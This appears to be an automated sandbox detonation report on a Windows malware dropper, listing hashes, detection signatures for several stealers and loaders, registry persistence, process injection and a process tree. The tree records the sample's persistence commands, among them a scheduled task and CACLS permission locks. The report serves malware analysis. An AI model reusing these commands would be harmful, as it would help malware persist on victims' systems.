C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 14bda3d356b7020c5f2c22505c31f484
SHA1 d59cbe38a663846235218ff17ad51dea4f9b5477
SHA256 1f98c7ce4a2910cd6e6a7bd9bfc1b88f0267ec29c090616dabd49729498e6945
SHA512 e28dc90762037d16ab0780d3d78cdf4bec34d534d76640d34de9ea6343214440c63dda15e7f30c965baa8b1140a94e75855f319a58b0b5626a6866f8296aefcf

memory/2380-1197-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2380-1199-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2380-1201-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2380-1203-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2380-1205-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2380-1207-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2380-1218-0x0000000000400000-0x000000000047F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f5d6af9c141f4d3f103942179a374a1e
SHA1 b017915698ae1241ec3e2012c028fb1d1275e086
SHA256 23bc9162a15a74371de18385afcbf7a997d9d431de1edd11091df31f404a96bb
SHA512 4ed5222b1a159a94bffee21812bd3ceb00f02388c31b51acee1242f7cebf776c189c328e9de76070fbb0ec8a9f3fa8a5a690834f0d350f7be49c1ccd9a505a33

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6ee1f00fb408f36dced6bf2dffad4247
SHA1 58ae2829ead191ad90929ca6748fbe1b88f8d671
SHA256 9d68a09e0257d0c22986cee0d3b89ae9ef0875ad4bdb67a05bb097da0218cea4
SHA512 55b392a54fd0e66908cf1546c1600be10ff78b4e88bec1b83cf953fb2fda6d1054ea8bf66c799408d06c264127d1c7189c3a33000ca508c533478956f571258a

memory/3056-1262-0x0000000070B80000-0x000000007126E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1fff87e8eda47b19d0c082a88140f87d
SHA1 7675c286e38ead06865c7f07fd79f34f5dec064c
SHA256 4c3f753241b24c0d7a6354f76540c5641aa0bf78cb89950cfbfb76c6ae9e6433
SHA512 2deb671ad25f4eeff4666214ac05a88e07c4a98ba9b62dd30665e59d9ebde650826e75cbc0cff23297c831a23955277dc4f9dbe20f1aa7f47e6a4cc9ad9caf37

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1fff87e8eda47b19d0c082a88140f87d
SHA1 7675c286e38ead06865c7f07fd79f34f5dec064c
SHA256 4c3f753241b24c0d7a6354f76540c5641aa0bf78cb89950cfbfb76c6ae9e6433
SHA512 2deb671ad25f4eeff4666214ac05a88e07c4a98ba9b62dd30665e59d9ebde650826e75cbc0cff23297c831a23955277dc4f9dbe20f1aa7f47e6a4cc9ad9caf37

memory/2720-1368-0x0000000070B80000-0x000000007126E000-memory.dmp

memory/2448-1369-0x000000001B210000-0x000000001B4F2000-memory.dmp

memory/2448-1371-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

memory/2448-1418-0x0000000002594000-0x0000000002597000-memory.dmp

memory/2448-1408-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

memory/2448-1419-0x000000000259B000-0x0000000002602000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3V0T767YOKO9ZX48K1SO.temp

MD5 eabc35d24ba8c57d319d3346d2e79999
SHA1 3ec4032ece11e52987695c4c558f509a878ae544
SHA256 aa0c1c6ce2d8af962eddc87546819b6146e366b2c79429096a3ba446155bfc2e
SHA512 442c61640dbd26591a9ee8965704e0d5aa1dc5a92137f1bd0beb5bb0c15976a470cd60501b15c08ccaf4e0cd937d83ea1ac8d1dcc0040b6cc4ee1963f40b5f37

memory/1972-1453-0x000000001B150000-0x000000001B432000-memory.dmp

memory/1972-1454-0x0000000002420000-0x0000000002428000-memory.dmp

memory/1972-1483-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

memory/1972-1484-0x00000000022A4000-0x00000000022A7000-memory.dmp

memory/1972-1485-0x00000000022AB000-0x0000000002312000-memory.dmp

memory/1092-1500-0x0000000004080000-0x0000000004478000-memory.dmp

memory/1092-1501-0x0000000004480000-0x0000000004D6B000-memory.dmp

memory/1092-1502-0x0000000000400000-0x000000000266D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:48

Reported

2023-10-10 21:20

Platform

win10v2004-20230915-en

Max time kernel

24s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe N/A

Legitimate hosting services abused for malware hosting/C2

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3664 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 3664 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 3664 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 3872 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 3872 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 3872 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3872 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe
PID 3872 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe
PID 3872 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3664 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe
PID 3664 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe
PID 3664 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2812 -ip 2812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 148

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3236 -ip 3236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3056 -ip 3056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 540

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe

C:\Users\Admin\AppData\Local\Temp\C01.exe

C:\Users\Admin\AppData\Local\Temp\C01.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Il6Jj0CT.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Il6Jj0CT.exe

C:\Users\Admin\AppData\Local\Temp\1ECF.exe

C:\Users\Admin\AppData\Local\Temp\1ECF.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nn9Ie4tJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nn9Ie4tJ.exe

C:\Users\Admin\AppData\Local\Temp\1FCA.bat

"C:\Users\Admin\AppData\Local\Temp\1FCA.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3852 -ip 3852

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Bf8HN4LX.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Bf8HN4LX.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sn1qc8gI.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sn1qc8gI.exe

C:\Users\Admin\AppData\Local\Temp\23F1.exe

C:\Users\Admin\AppData\Local\Temp\23F1.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 404

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Nd72JG2.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Nd72JG2.exe

C:\Users\Admin\AppData\Local\Temp\2615.exe

C:\Users\Admin\AppData\Local\Temp\2615.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3976 -ip 3976

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\2923.exe

C:\Users\Admin\AppData\Local\Temp\2923.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 3368 -ip 3368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3308 -ip 3308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 576

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2YI081ao.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2YI081ao.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\243C.tmp\244D.tmp\244E.bat C:\Users\Admin\AppData\Local\Temp\1FCA.bat"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Users\Admin\AppData\Local\Temp\4C3D.exe

C:\Users\Admin\AppData\Local\Temp\4C3D.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\959B.exe

C:\Users\Admin\AppData\Local\Temp\959B.exe

C:\Users\Admin\AppData\Local\Temp\98B9.exe

C:\Users\Admin\AppData\Local\Temp\98B9.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa5da346f8,0x7ffa5da34708,0x7ffa5da34718

C:\Users\Admin\AppData\Local\Temp\9A6F.exe

C:\Users\Admin\AppData\Local\Temp\9A6F.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa5da346f8,0x7ffa5da34708,0x7ffa5da34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,3099775985591816448,3937921857755771116,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,3099775985591816448,3937921857755771116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

